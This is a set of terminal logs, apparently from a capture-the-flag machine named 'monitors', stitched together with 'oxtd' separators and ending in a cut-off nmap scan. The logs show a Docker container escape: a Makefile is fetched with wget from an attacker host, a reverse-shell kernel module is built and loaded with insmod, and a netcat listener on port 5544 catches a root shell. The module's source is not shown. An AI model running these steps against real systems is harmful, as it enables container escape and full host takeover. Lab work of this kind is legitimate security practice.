oxtd

root@53bdb03130a9:/usr/src/apache-ofbiz-17.12.01# ip addr show
ip addr show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
5: eth0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever

oxtd

root@53bdb03130a9:/tmp# capsh --print
capsh --print                                                                                                                                                                                  
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)

oxtd

root@53bdb03130a9:/tmp# wget http://10.10.14.225/Makefile
wget http://10.10.14.225/Makefile
--2021-09-11 08:20:24--  http://10.10.14.225/Makefile
Connecting to 10.10.14.225:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 161 [application/octet-stream]
Saving to: 'Makefile'

Makefile            100%[===================>]     161  --.-KB/s    in 0s      

oxtd

root@53bdb03130a9:/root# ls
ls
Makefile  reverse-shell.c
root@53bdb03130a9:/root# echo $PATH 
echo $PATH
/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:./usr/lib/gcc/x86_64-linux-gnu/8/
root@53bdb03130a9:/root# make clean
make clean
make -C /lib/modules/4.15.0-142-generic/build M=/root clean
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'

oxtd

root@53bdb03130a9:/root# ls
ls
Makefile        modules.order    reverse-shell.ko     reverse-shell.mod.o
Module.symvers  reverse-shell.c  reverse-shell.mod.c  reverse-shell.o

oxtd

marcus@monitors:~$ nc -lvnp 5544
Listening on [0.0.0.0] (family 0, port 5544)

oxtd

root@53bdb03130a9:/root# insmod reverse-shell.ko
insmod reverse-shell.ko

oxtd

marcus@monitors:~$ nc -lvnp 5544
Listening on [0.0.0.0] (family 0, port 5544)
Connection from 10.10.10.238 46392 received!
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@monitors:/# whoami
whoami
root

oxtd

root@monitors:/# pwd
pwd
/
root@monitors:/# cd /root
cd /root
root@monitors:/root# ls
ls
root.txt

oxtd

sudo nmap 10.129.217.192 -sC -sV -oN nmap-tcp-full -p 22,80 --min-rate 10000
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-12 17:18 IST
Nmap scan report for 10.129.217.192
Host is up (0.18s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA)
|   256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA)